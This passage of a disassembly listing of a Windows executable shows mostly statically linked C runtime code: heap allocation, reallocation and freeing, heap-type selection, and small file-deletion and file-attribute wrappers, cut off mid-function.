add esp, 18h
loc_41BC8E: ; CODE XREF: sub_41BBE2+74�j
test edi, edi
jnz short loc_41BCD5
loc_41BC92: ; CODE XREF: sub_41BBE2+62�j
; sub_41BBE2+81�j
test esi, esi
jnz short loc_41BC99
push 1
pop esi
loc_41BC99: ; CODE XREF: sub_41BBE2+B2�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_41BCD5
mov ecx, [ebp+Src]
mov eax, [ecx-4]
dec eax
cmp eax, esi
jb short loc_41BCC1
mov eax, esi
loc_41BCC1: ; CODE XREF: sub_41BBE2+DB�j
push eax ; Size
push ecx ; Src
push edi ; Dst
call _memcpy
push [ebp+Src]
push ebx
call sub_41E742
add esp, 14h
loc_41BCD5: ; CODE XREF: sub_41BBE2+AE�j
; sub_41BBE2+D0�j
test ebx, ebx
jnz short loc_41BCFA
loc_41BCD9: ; CODE XREF: sub_41BBE2+56�j
test esi, esi
jnz short loc_41BCE0
push 1
pop esi
loc_41BCE0: ; CODE XREF: sub_41BBE2+F9�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+Src]
push 0
push dword_4DD384
call ds:dword_4271A0 ; RtlReAllocateHeap
mov edi, eax
loc_41BCFA: ; CODE XREF: sub_41BBE2+F5�j
test edi, edi
jnz short loc_41BD1B
loc_41BCFE: ; CODE XREF: sub_41BBE2+43�j
cmp dword_4DBE48, 0
jz short loc_41BD1B
push esi
call __callnewh
test eax, eax
pop ecx
jnz loc_41BC20
jmp loc_41BE7B
; ---------------------------------------------------------------------------
loc_41BD1B: ; CODE XREF: sub_41BBE2+11A�j
; sub_41BBE2+123�j ...
mov eax, edi
jmp loc_41BE7D
; ---------------------------------------------------------------------------
loc_41BD22: ; CODE XREF: sub_41BBE2+38�j
cmp eax, 2
jnz loc_41BE3D
cmp esi, 0FFFFFFE0h
ja short loc_41BD3F
test esi, esi
jbe short loc_41BD3C
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_41BD3F
; ---------------------------------------------------------------------------
loc_41BD3C: ; CODE XREF: sub_41BBE2+150�j
push 10h
pop esi
loc_41BD3F: ; CODE XREF: sub_41BBE2+14C�j
; sub_41BBE2+158�j ...
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_41BE1F
lea eax, [ebp+Size]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+Src]
call sub_41F472
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jz loc_41BE03
cmp esi, dword_43CE74
jnb short loc_41BDC7
mov edi, esi
shr edi, 4
push edi
push ebx
push [ebp+Size]
push [ebp+var_4]
call sub_41F83A
add esp, 10h
test eax, eax
jz short loc_41BD8D
mov edi, [ebp+Src]
jmp short loc_41BDBF
; ---------------------------------------------------------------------------
loc_41BD8D: ; CODE XREF: sub_41BBE2+1A4�j
push edi
call sub_41F50E
mov edi, eax
pop ecx
test edi, edi
jz short loc_41BDC7
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_41BDA6
mov eax, esi
loc_41BDA6: ; CODE XREF: sub_41BBE2+1C0�j
push eax ; Size
push [ebp+Src] ; Src
push edi ; Dst
call _memcpy
push ebx
push [ebp+Size]
push [ebp+var_4]
call sub_41F4C9
add esp, 18h
loc_41BDBF: ; CODE XREF: sub_41BBE2+1A9�j
test edi, edi
jnz loc_41BD1B
loc_41BDC7: ; CODE XREF: sub_41BBE2+18B�j
; sub_41BBE2+1B6�j
push esi
push 0
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_41BE1F
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_41BDE8
mov eax, esi
loc_41BDE8: ; CODE XREF: sub_41BBE2+202�j
push eax ; Size
push [ebp+Src] ; Src
push edi ; Dst
call _memcpy
push ebx
push [ebp+Size]
push [ebp+var_4]
call sub_41F4C9
add esp, 18h
jmp short loc_41BE17
; ---------------------------------------------------------------------------
loc_41BE03: ; CODE XREF: sub_41BBE2+17F�j
push esi
push [ebp+Src]
push 0
push dword_4DD384
call ds:dword_4271A0 ; RtlReAllocateHeap
mov edi, eax
loc_41BE17: ; CODE XREF: sub_41BBE2+21F�j
test edi, edi
jnz loc_41BD1B
loc_41BE1F: ; CODE XREF: sub_41BBE2+162�j
; sub_41BBE2+1F8�j
cmp dword_4DBE48, 0
jz loc_41BD1B
push esi
call __callnewh
test eax, eax
pop ecx
jnz loc_41BD3F
jmp short loc_41BE7B
; ---------------------------------------------------------------------------
loc_41BE3D: ; CODE XREF: sub_41BBE2+143�j
; sub_41BBE2+297�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_41BE67
test esi, esi
jnz short loc_41BE4B
push 1
pop esi
loc_41BE4B: ; CODE XREF: sub_41BBE2+264�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+Src]
push 0
push dword_4DD384
call ds:dword_4271A0 ; RtlReAllocateHeap
test eax, eax
jnz short loc_41BE7D
loc_41BE67: ; CODE XREF: sub_41BBE2+260�j
cmp dword_4DBE48, 0
jz short loc_41BE7D
push esi
call __callnewh
test eax, eax
pop ecx
jnz short loc_41BE3D
loc_41BE7B: ; CODE XREF: sub_41BBE2+2B�j
; sub_41BBE2+134�j ...
xor eax, eax
loc_41BE7D: ; CODE XREF: sub_41BBE2+16�j
; sub_41BBE2+13B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41BBE2 endp
; [00000020 BYTES: COLLAPSED FUNCTION __fsopen. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION _fopen. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41BEF3 proc near ; CODE XREF: __nh_malloc+B�p
arg_0 = dword ptr 4
mov eax, dword_4DD388
push esi
mov esi, [esp+4+arg_0]
cmp eax, 3
jnz short loc_41BF17
cmp esi, dword_4DD380
ja short loc_41BF49
push esi
call ___sbh_alloc_block
test eax, eax
pop ecx
jz short loc_41BF49
pop esi
retn
; ---------------------------------------------------------------------------
loc_41BF17: ; CODE XREF: sub_41BEF3+D�j
cmp eax, 2
jnz short loc_41BF49
mov eax, [esp+4+arg_0]
test eax, eax
jz short loc_41BF2C
lea esi, [eax+0Fh]
and esi, 0FFFFFFF0h
jmp short loc_41BF2F
; ---------------------------------------------------------------------------
loc_41BF2C: ; CODE XREF: sub_41BEF3+2F�j
push 10h
pop esi
loc_41BF2F: ; CODE XREF: sub_41BEF3+37�j
cmp esi, dword_43CE74
ja short loc_41BF56
mov eax, esi
shr eax, 4
push eax
call sub_41F50E
test eax, eax
pop ecx
jnz short loc_41BF65
jmp short loc_41BF56
; ---------------------------------------------------------------------------
loc_41BF49: ; CODE XREF: sub_41BEF3+15�j
; sub_41BEF3+20�j ...
test esi, esi
jnz short loc_41BF50
push 1
pop esi
loc_41BF50: ; CODE XREF: sub_41BEF3+58�j
add esi, 0Fh
and esi, 0FFFFFFF0h
loc_41BF56: ; CODE XREF: sub_41BEF3+42�j
; sub_41BEF3+54�j
push esi
push 0
push dword_4DD384
call ds:dword_427150 ; RtlAllocateHeap
loc_41BF65: ; CODE XREF: sub_41BEF3+52�j
pop esi
retn
sub_41BEF3 endp
; ---------------------------------------------------------------------------
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FE BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; [0000008B BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION _atoi. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000052 BYTES: COLLAPSED FUNCTION _sprintf. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41C2B8 proc near ; CODE XREF: WinMain(x,x,x,x)+45�p
; sub_401ACD+315E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_43AE00, eax
retn
sub_41C2B8 endp
; [0000001E BYTES: COLLAPSED FUNCTION _rand. PRESS KEYPAD "+" TO EXPAND]
; [00000080 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
; [00000051 BYTES: COLLAPSED FUNCTION __snprintf. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION __splitpath. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [00000057 BYTES: COLLAPSED FUNCTION _fgets. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION _strtol. PRESS KEYPAD "+" TO EXPAND]
; [00000208 BYTES: COLLAPSED FUNCTION _strtoxl. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION _strtoul. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41C7BC proc near ; CODE XREF: sub_401ACD+58AD�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_427088 ; DeleteFileA
test eax, eax
jnz short loc_41C7D2
call ds:dword_427094 ; RtlGetLastWin32Error
jmp short loc_41C7D4
; ---------------------------------------------------------------------------
loc_41C7D2: ; CODE XREF: sub_41C7BC+C�j
xor eax, eax
loc_41C7D4: ; CODE XREF: sub_41C7BC+14�j
test eax, eax
jz short loc_41C7E3
push eax
call __dosmaperr
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41C7E3: ; CODE XREF: sub_41C7BC+1A�j
xor eax, eax
retn
sub_41C7BC endp
; [00000032 BYTES: COLLAPSED FUNCTION _fprintf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000027 BYTES: COLLAPSED FUNCTION _strrchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000038 BYTES: COLLAPSED FUNCTION _strncmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E0 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BC BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000084 BYTES: COLLAPSED FUNCTION _strcmp. PRESS KEYPAD "+" TO EXPAND]
; [0000009C BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
; [00000050 BYTES: COLLAPSED FUNCTION __vsnprintf. PRESS KEYPAD "+" TO EXPAND]
; [00000123 BYTES: COLLAPSED FUNCTION _strncat. PRESS KEYPAD "+" TO EXPAND]
; [00000034 BYTES: COLLAPSED FUNCTION _sscanf. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
; [000000CF BYTES: COLLAPSED FUNCTION _floor. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION __fpmath. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; [00000038 BYTES: COLLAPSED FUNCTION __cfltcvt_init. PRESS KEYPAD "+" TO EXPAND]
; [00000027 BYTES: COLLAPSED FUNCTION __ftol. PRESS KEYPAD "+" TO EXPAND]
; [000000CF BYTES: COLLAPSED FUNCTION _ceil. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION _JumpToContinuation(void *,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn 8
; [00000007 BYTES: COLLAPSED FUNCTION sub_41D29E. PRESS KEYPAD "+" TO EXPAND]
; [00000007 BYTES: COLLAPSED FUNCTION sub_41D2A5. PRESS KEYPAD "+" TO EXPAND]
; [0000004F BYTES: COLLAPSED FUNCTION unknown_libname_2. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION ___CxxFrameHandler. PRESS KEYPAD "+" TO EXPAND]
; [00000054 BYTES: COLLAPSED FUNCTION _CallCatchBlock2(EHRegistrationNode *,_s_FuncInfo const *,void *,int,ulong). PRESS KEYPAD "+" TO EXPAND]
; [00000025 BYTES: COLLAPSED FUNCTION CatchGuardHandler(EHExceptionRecord *,CatchGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
; [000000B4 BYTES: COLLAPSED FUNCTION _CallSETranslator(EHExceptionRecord *,EHRegistrationNode *,void *,void *,_s_FuncInfo const *,int,EHRegistrationNode *). PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION TranslatorGuardHandler(EHExceptionRecord *,TranslatorGuardRN *,void *,void *). PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _GetRangeOfTrysToCheck(_s_FuncInfo const *,int,int,uint *,uint *). PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION __NLG_Notify1. PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001F BYTES: COLLAPSED FUNCTION __EH_prolog. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41D65F proc near ; CODE XREF: std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool)+26�p
; sub_4260E2+10�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_41BA91
pop ecx
retn
sub_41D65F endp
; ---------------------------------------------------------------------------
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [0000006D BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION _wcscat. PRESS KEYPAD "+" TO EXPAND]
; [0000008C BYTES: COLLAPSED FUNCTION _fseek. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; [0000010A BYTES: COLLAPSED FUNCTION _fwrite. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41DC5E proc near ; CODE XREF: sub_416CAF+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_4270A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_41DC7E
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
call __dosmaperr
pop ecx
loc_41DC7A: ; CODE XREF: sub_41DC5E+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41DC7E: ; CODE XREF: sub_41DC5E+D�j
test al, 1
jz short loc_41DC9F
test [esp+arg_4], 2
jz short loc_41DC9F
mov dword_4DBDDC, 0Dh
mov dword_4DBDE0, 5
jmp short loc_41DC7A
; ---------------------------------------------------------------------------
loc_41DC9F: ; CODE XREF: sub_41DC5E+22�j
; sub_41DC5E+29�j
xor eax, eax
retn
sub_41DC5E endp
; ---------------------------------------------------------------------------
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000075 BYTES: COLLAPSED FUNCTION __aullrem. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AA BYTES: COLLAPSED FUNCTION __alldiv. PRESS KEYPAD "+" TO EXPAND]
; [0000009E BYTES: COLLAPSED FUNCTION __strupr. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION _isdigit. PRESS KEYPAD "+" TO EXPAND]
; [00000028 BYTES: COLLAPSED FUNCTION _isspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000AC BYTES: COLLAPSED FUNCTION _memcmp. PRESS KEYPAD "+" TO EXPAND]
; [000000CB BYTES: COLLAPSED FUNCTION _tolower. PRESS KEYPAD "+" TO EXPAND]
; [0000001D BYTES: COLLAPSED FUNCTION _wcslen. PRESS KEYPAD "+" TO EXPAND]
; [000000FF BYTES: COLLAPSED FUNCTION _mbstowcs. PRESS KEYPAD "+" TO EXPAND]
; [000000D7 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call __exit
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [00000024 BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
; [000000B3 BYTES: COLLAPSED FUNCTION __close. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION __freebuf. PRESS KEYPAD "+" TO EXPAND]
; [0000003B BYTES: COLLAPSED FUNCTION _fflush. PRESS KEYPAD "+" TO EXPAND]
; [0000005C BYTES: COLLAPSED FUNCTION __flush. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41E487 proc near ; CODE XREF: ___endstdio�p
push 1
call _flsall
pop ecx
retn
sub_41E487 endp
; [0000006D BYTES: COLLAPSED FUNCTION _flsall. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_41E4FD proc near ; CODE XREF: sub_41E52A+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call ds:dword_4270A4 ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_41E528
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_41E528
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_41E528: ; CODE XREF: sub_41E4FD+15�j
; sub_41E4FD+1C�j
pop esi
retn
sub_41E4FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E52A proc near ; CODE XREF: sub_41E672+20�p
Str = byte ptr -122Ch
SubStr = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call __alloca_probe
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call ds:dword_4270D0 ; GetVersionExA
test eax, eax
jz short loc_41E56D
cmp [ebp+var_88], 2
jnz short loc_41E56D
cmp [ebp+var_94], 5
jb short loc_41E56D
push 1
pop eax
jmp loc_41E66F
; ---------------------------------------------------------------------------
loc_41E56D: ; CODE XREF: sub_41E52A+27�j
; sub_41E52A+30�j ...
lea eax, [ebp+Str]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call ds:dword_4271B4 ; GetEnvironmentVariableA
test eax, eax
jz loc_41E65C
xor ebx, ebx
lea ecx, [ebp+Str]
cmp [ebp+Str], bl
jz short loc_41E5AF
loc_41E59C: ; CODE XREF: sub_41E52A+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_41E5AA
cmp al, 7Ah
jg short loc_41E5AA
sub al, 20h
mov [ecx], al
loc_41E5AA: ; CODE XREF: sub_41E52A+76�j
; sub_41E52A+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_41E59C
loc_41E5AF: ; CODE XREF: sub_41E52A+70�j
lea eax, [ebp+Str]
push 16h ; MaxCount
push eax ; Str2
push offset Str1 ; "__GLOBAL_HEAP_SELECTED"
call _strncmp
add esp, 0Ch
test eax, eax
jnz short loc_41E5D1
lea eax, [ebp+Str]
jmp short loc_41E61A
; ---------------------------------------------------------------------------
loc_41E5D1: ; CODE XREF: sub_41E52A+9D�j
lea eax, [ebp+SubStr]
push 104h
push eax
push ebx
call ds:dword_427078 ; GetModuleFileNameA
cmp [ebp+SubStr], bl
lea ecx, [ebp+SubStr]
jz short loc_41E605
loc_41E5F2: ; CODE XREF: sub_41E52A+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_41E600
cmp al, 7Ah
jg short loc_41E600
sub al, 20h
mov [ecx], al
loc_41E600: ; CODE XREF: sub_41E52A+CC�j
; sub_41E52A+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_41E5F2
loc_41E605: ; CODE XREF: sub_41E52A+C6�j
lea eax, [ebp+SubStr]
push eax ; SubStr
lea eax, [ebp+Str]
push eax ; Str
call _strstr
pop ecx
pop ecx
loc_41E61A: ; CODE XREF: sub_41E52A+A5�j
cmp eax, ebx
jz short loc_41E65C
push 2Ch ; Val
push eax ; Str
call _strchr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41E65C
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_41E641
loc_41E633: ; CODE XREF: sub_41E52A+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_41E63C
mov [ecx], bl
jmp short loc_41E63D
; ---------------------------------------------------------------------------
loc_41E63C: ; CODE XREF: sub_41E52A+10C�j
inc ecx
loc_41E63D: ; CODE XREF: sub_41E52A+110�j
cmp [ecx], bl
jnz short loc_41E633
loc_41E641: ; CODE XREF: sub_41E52A+107�j
push 0Ah ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtol
add esp, 0Ch
cmp eax, 2
jz short loc_41E66F
cmp eax, 3
jz short loc_41E66F
cmp eax, 1
jz short loc_41E66F
loc_41E65C: ; CODE XREF: sub_41E52A+5C�j
; sub_41E52A+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_41E4FD
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_41E66F: ; CODE XREF: sub_41E52A+3E�j
; sub_41E52A+126�j ...
pop ebx
leave
retn
sub_41E52A endp
; =============== S U B R O U T I N E =======================================
sub_41E672 proc near ; CODE XREF: start+5A�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call ds:dword_4271BC ; HeapCreate
test eax, eax
mov dword_4DD384, eax
jz short loc_41E6C8
call sub_41E52A
cmp eax, 3
mov dword_4DD388, eax
jnz short loc_41E6AE
push 3F8h
call ___sbh_heap_init
pop ecx
jmp short loc_41E6B8
; ---------------------------------------------------------------------------
loc_41E6AE: ; CODE XREF: sub_41E672+2D�j
cmp eax, 2
jnz short loc_41E6CB
call sub_41F216
loc_41E6B8: ; CODE XREF: sub_41E672+3A�j
test eax, eax
jnz short loc_41E6CB
push dword_4DD384
call ds:dword_4271B8 ; HeapDestroy
loc_41E6C8: ; CODE XREF: sub_41E672+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41E6CB: ; CODE XREF: sub_41E672+3F�j
; sub_41E672+48�j
push 1
pop eax
retn
sub_41E672 endp
; [00000048 BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E742 proc near ; CODE XREF: sub_41BA91+23�p
; sub_41BBE2+A4�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41EA66
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_41E818
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41E7A6
push 3Fh
pop edx
loc_41E7A6: ; CODE XREF: sub_41E742+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41E7FA
cmp edx, 20h
jnb short loc_41E7D1
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41E7F2
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41E7F2
; ---------------------------------------------------------------------------
loc_41E7D1: ; CODE XREF: sub_41E742+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41E7F2
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41E7F2: ; CODE XREF: sub_41E742+86�j
; sub_41E742+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_41E7FD
; ---------------------------------------------------------------------------
loc_41E7FA: ; CODE XREF: sub_41E742+6A�j
mov ecx, [ebp+var_4]
loc_41E7FD: ; CODE XREF: sub_41E742+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_41E818: ; CODE XREF: sub_41E742+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_41E826
push 3Fh
pop edx
loc_41E826: ; CODE XREF: sub_41E742+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_41E8C9
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_41E84B
mov ebx, esi
loc_41E84B: ; CODE XREF: sub_41E742+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_41E85D
mov edx, esi
loc_41E85D: ; CODE XREF: sub_41E742+117�j
cmp ebx, edx
jz short loc_41E8C4
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_41E8AC
cmp ebx, 20h
jnb short loc_41E88D
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41E8AC
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_41E8AC
; ---------------------------------------------------------------------------
loc_41E88D: ; CODE XREF: sub_41E742+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_41E8AC
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_41E8AC: ; CODE XREF: sub_41E742+128�j
; sub_41E742+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_41E8C4: ; CODE XREF: sub_41E742+11D�j
mov esi, [ebp+arg_4]
